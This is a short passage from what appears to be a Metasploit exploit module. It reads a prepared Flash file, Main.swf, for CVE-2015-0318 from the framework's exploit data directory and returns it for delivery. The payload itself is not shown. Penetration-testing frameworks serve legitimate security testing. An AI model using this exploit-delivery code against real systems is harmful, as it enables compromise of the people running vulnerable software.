path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2015-0318", "Main.swf" )
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end